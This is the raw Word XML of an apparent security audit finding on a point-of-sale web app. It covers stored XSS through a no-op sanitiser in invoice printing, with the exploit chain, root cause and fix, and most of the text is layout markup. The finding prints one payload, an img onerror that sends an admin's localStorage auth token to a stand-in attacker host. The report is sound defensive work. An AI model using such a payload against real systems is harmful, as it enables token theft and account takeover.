                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                          <w:t>.replace</w:t>
                        </w:r>
                        <w:proofErr w:type="gramEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                          <w:t>()</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 706" o:spid="_x0000_s1209" style="position:absolute;left:22068;top:16287;width:52965;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30616C4B" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve"> that is not there. This made it the most dangerous line in the file: a reviewer</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 707" o:spid="_x0000_s1210" style="position:absolute;top:18002;width:5089;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0058087E" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve">seeing </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 708" o:spid="_x0000_s1211" style="position:absolute;left:3810;top:17818;width:12763;height:1429;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="12763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7wQAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE89a8Mw&#10;EN0L+Q/iAtlqKYGkxo0SSqBQyOS0Q8erdbXdSCcjyY7z76uh0PHxvvfH2VkxUYi9Zw3rQoEgbrzp&#10;udXw8f76WIKICdmg9Uwa7hTheFg87LEy/sY1TZfUihzCsUINXUpDJWVsOnIYCz8QZ+7bB4cpw9BK&#10;E/CWw52VG6V20mHPuaHDgU4dNdfL6DRclTTTZ/21/dnZsh7lfN6MQ9B6tZxfnkEkmtO/+M/9ZjQ8&#10;qbw2n8lHQB5+AQAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAAAAAA&#10;AAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsAAAAA&#10;AAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAP48C7vBAAAA3AAAAA8AAAAA&#10;AAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD1AgAAAAA=&#10;" path="m9525,l1266825,v2630,,4875,930,6735,2784c1275420,4645,1276350,6893,1276350,9525r,123825c1276350,135976,1275420,138224,1273560,140084v-1860,1861,-4105,2791,-6735,2791l9525,142875v-2630,,-4875,-930,-6735,-2791c930,138224,,135976,,133350l,9525c,6893,930,4645,2790,2784,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,1276350,142875"/>
                </v:shape>
                <v:rect id="Rectangle 709" o:spid="_x0000_s1212" style="position:absolute;left:4097;top:18055;width:16279;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5F3B42DD" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:proofErr w:type="spellStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                          <w:t>cleanProductName</w:t>
                        </w:r>
                        <w:proofErr w:type="spellEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                          <w:t>(...)</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 710" o:spid="_x0000_s1213" style="position:absolute;left:16607;top:18002;width:5537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13568A76" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve"> at the interpolation site would reasonably assume the value had been handled.</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FED58C4" w14:textId="1BEEEFC2" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:spacing w:after="326"/>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Exploit chain.</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> A cashier saves a customer named or types into an invoice note:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7360C5" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:spacing w:after="397" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="182"/>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&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas"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src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=x onerror="fetch('https://evil.example/?t='+localStorage.authToken)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1854524A"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3056" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0372AB57" wp14:editId="6123EBBD">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>18157</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-513670</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6480126" cy="809625"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="26917" name="Group 26917"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="6480126" cy="809625"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="6480126" cy="809625"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="654" name="Shape 654"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="6480126" cy="371475"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="6480126" h="371475">
                                <a:moveTo>
                                  <a:pt x="19050" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="6467474" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6470001" y="0"/>
                                  <a:pt x="6472430" y="484"/>
                                  <a:pt x="6474764" y="1445"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="6480126" y="5028"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6480126" y="366440"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6474764" y="370018"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6472430" y="370985"/>
                                  <a:pt x="6470001" y="371469"/>
                                  <a:pt x="6467474" y="371475"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="19050" y="371475"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="16524" y="371469"/>
                                  <a:pt x="14094" y="370985"/>
                                  <a:pt x="11760" y="370018"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="9426" y="369050"/>
                                  <a:pt x="7366" y="367674"/>
                                  <a:pt x="5580" y="365894"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="3793" y="364108"/>
                                  <a:pt x="2417" y="362046"/>
                                  <a:pt x="1450" y="359711"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="352425"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="19050"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1450" y="11751"/>
                                </a:ln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718" name="Shape 718"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5467349" y="676275"/>
                            <a:ext cx="762000" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="762000" h="133350">
                                <a:moveTo>
                                  <a:pt x="9526" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="752475" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="755105" y="0"/>
                                  <a:pt x="757350" y="930"/>
                                  <a:pt x="759210" y="2784"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="761069" y="4645"/>
                                  <a:pt x="762000" y="6893"/>
                                  <a:pt x="762000" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="762000" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="762000" y="126451"/>
                                  <a:pt x="761069" y="128699"/>
                                  <a:pt x="759210" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="757350" y="132420"/>
                                  <a:pt x="755105" y="133350"/>
                                  <a:pt x="752475" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9526" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133350"/>
                                  <a:pt x="4650" y="132420"/>
                                  <a:pt x="2790" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="128699"/>
                                  <a:pt x="0" y="126451"/>
                                  <a:pt x="1" y="123825"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6893"/>
                                  <a:pt x="930" y="4645"/>
                                  <a:pt x="2790" y="2784"/>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17" style="width:510.246pt;height:63.75pt;position:absolute;z-index:-2147483614;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:1.42969pt;mso-position-vertical-relative:text;margin-top:-40.4465pt;" coordsize="64801,8096">
                <v:shape id="Shape 654" style="position:absolute;width:64801;height:3714;left:0;top:0;" coordsize="6480126,371475" path="m19050,0l6467474,0c6470001,0,6472430,484,6474764,1445l6480126,5028l6480126,366440l6474764,370018c6472430,370985,6470001,371469,6467474,371475l19050,371475c16524,371469,14094,370985,11760,370018c9426,369050,7366,367674,5580,365894c3793,364108,2417,362046,1450,359711l0,352425l0,19050l1450,11751c2417,9423,3793,7361,5580,5575c7366,3789,9426,2412,11760,1445c14094,484,16524,0,19050,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#102b46"/>
                </v:shape>
                <v:shape id="Shape 718" style="position:absolute;width:7620;height:1333;left:54673;top:6762;" coordsize="762000,133350" path="m9526,0l752475,0c755105,0,757350,930,759210,2784c761069,4645,762000,6893,762000,9525l762000,123825c762000,126451,761069,128699,759210,130559c757350,132420,755105,133350,752475,133350l9526,133350c6895,133350,4650,132420,2790,130559c930,128699,0,126451,1,123825l1,9525c0,6893,930,4645,2790,2784c4650,930,6895,0,9526,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Nothing happens at that point. The payload fires when an </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>administrator</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> later prints that invoice from Sales History. It executes in a same-origin window and exfiltrates the admin's bearer token, which the application kept in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>localStorage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where script can read it (V-16</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>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which never expired (V-06).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E5A9DC"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Stored XSS to full administrator account takeover, triggered by a routine business action, requiring only the ability to type a customer's name. Product names imported from a spreadsheet (V-17) reach the same sink.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F24698" w14:textId="17A9B9D9" w:rsidR="00C73B1A" w:rsidRPr="0011533D" w:rsidRDefault="008125F0" w:rsidP="0011533D">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Root cause.</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> A rendering path that bypasses the framework's protection. The team's mental model was "React escapes for </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>us" —</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> correct for 23 of 24 pages, and wrong for the one that builds HTML by hand. The no-op </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sanitiser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> suggests the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>escaping</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> once existed and was lost in a refactor with nothing to catch it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0332ABCF" w14:textId="618B2A08" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:spacing w:after="188"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Fix.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F5CB76" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="35"/>
        <w:ind w:right="16" w:hanging="25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4080" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3A17A846" wp14:editId="389F4D83">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>199132</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-19499</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1276350" cy="142875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="26921" name="Group 26921"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1276350" cy="142875"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="1276350" cy="142875"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="729" name="Shape 729"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1276350" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1276350" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1266825" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1269455" y="0"/>
                                  <a:pt x="1271700" y="930"/>
                                  <a:pt x="1273560" y="2784"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1275420" y="4645"/>
                                  <a:pt x="1276350" y="6893"/>
                                  <a:pt x="1276350" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1276350" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1276350" y="135976"/>
                                  <a:pt x="1275420" y="138224"/>
                                  <a:pt x="1273560" y="140078"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1271700" y="141939"/>
                                  <a:pt x="1269455" y="142869"/>
                                  <a:pt x="1266825" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142869"/>
                                  <a:pt x="4650" y="141939"/>
                                  <a:pt x="2790" y="140078"/>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21" style="width:100.5pt;height:11.25pt;position:absolute;z-index:-2147483571;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:15.6797pt;mso-position-vertical-relative:text;margin-top:-1.53546pt;" coordsize="12763,1428">
                <v:shape id="Shape 729" style="position:absolute;width:12763;height:1428;left:0;top:0;" coordsize="1276350,142875" path="m9525,0l1266825,0c1269455,0,1271700,930,1273560,2784c1275420,4645,1276350,6893,1276350,9525l1276350,133350c1276350,135976,1275420,138224,1273560,140078c1271700,141939,1269455,142869,1266825,142875l9525,142875c6895,142869,4650,141939,2790,140078c930,138224,0,135976,0,133350l0,9525c0,6893,930,4645,2790,2784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5104" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="526D6A63" wp14:editId="4A9742F6">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>5161656</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-19499</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="495301" cy="142875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="26923" name="Group 26923"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="495301" cy="142875"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="495301" cy="142875"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="734" name="Shape 734"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="114301" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="114301" h="142875">
                                <a:moveTo>
                                  <a:pt x="9526" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="104776" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="107406" y="0"/>
                                  <a:pt x="109651" y="930"/>
                                  <a:pt x="111511" y="2784"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="113371" y="4645"/>
                                  <a:pt x="114300" y="6893"/>
                                  <a:pt x="114301" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="114301" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="114300" y="135976"/>
                                  <a:pt x="113371" y="138224"/>
                                  <a:pt x="111511" y="140078"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="109651" y="141939"/>
                                  <a:pt x="107406" y="142869"/>
                                  <a:pt x="104776" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9526" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142869"/>
                                  <a:pt x="4650" y="141939"/>
                                  <a:pt x="2790" y="140078"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="138224"/>
                                  <a:pt x="0" y="135976"/>
                                  <a:pt x="1" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6893"/>
                                  <a:pt x="930" y="4645"/>
                                  <a:pt x="2790" y="2784"/>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37" name="Shape 737"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="381001" y="0"/>
                            <a:ext cx="114300" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="114300" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="104775" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="107405" y="0"/>
                                  <a:pt x="109650" y="930"/>
                                  <a:pt x="111509" y="2784"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="113369" y="4645"/>
                                  <a:pt x="114299" y="6893"/>
                                  <a:pt x="114300" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="114300" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="114299" y="135976"/>
                                  <a:pt x="113369" y="138224"/>
                                  <a:pt x="111509" y="140078"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="109650" y="141939"/>
                                  <a:pt x="107405" y="142869"/>
                                  <a:pt x="104775" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6894" y="142869"/>
                                  <a:pt x="4649" y="141939"/>
                                  <a:pt x="2789" y="140078"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="929" y="138224"/>
                                  <a:pt x="0" y="135976"/>
                                  <a:pt x="0" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6893"/>
                                  <a:pt x="929" y="4645"/>
                                  <a:pt x="2789" y="2784"/>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23" style="width:39.0001pt;height:11.25pt;position:absolute;z-index:-2147483565;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:406.43pt;mso-position-vertical-relative:text;margin-top:-1.53546pt;" coordsize="4953,1428">
                <v:shape id="Shape 734" style="position:absolute;width:1143;height:1428;left:0;top:0;" coordsize="114301,142875" path="m9526,0l104776,0c107406,0,109651,930,111511,2784c113371,4645,114300,6893,114301,9525l114301,133350c114300,135976,113371,138224,111511,140078c109651,141939,107406,142869,104776,142875l9526,142875c6895,142869,4650,141939,2790,140078c930,138224,0,135976,1,133350l1,9525c0,6893,930,4645,2790,2784c4650,930,6895,0,9526,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
                <v:shape id="Shape 737" style="position:absolute;width:1143;height:1428;left:3810;top:0;" coordsize="114300,142875" path="m9525,0l104775,0c107405,0,109650,930,111509,2784c113369,4645,114299,6893,114300,9525l114300,133350c114299,135976,113369,138224,111509,140078c109650,141939,107405,142869,104775,142875l9525,142875c6894,142869,4649,141939,2789,140078c929,138224,0,135976,0,133350l0,9525c0,6893,929,4645,2789,2784c4649,930,6894,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6128" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="27F0BFE5" wp14:editId="59FE7694">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3942456</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>151950</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="781050" cy="514350"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="26924" name="Group 26924"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
